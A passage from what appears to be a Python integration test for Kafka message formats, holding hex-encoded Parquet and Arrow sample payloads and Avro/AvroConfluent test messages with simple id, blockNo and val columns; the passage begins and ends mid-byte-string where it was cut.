x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\
x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one Avro file per message,
# because of the nature of Avro: blocks simply follow one another
# within a single container (a minimal helper sketch follows this test).
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\
x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\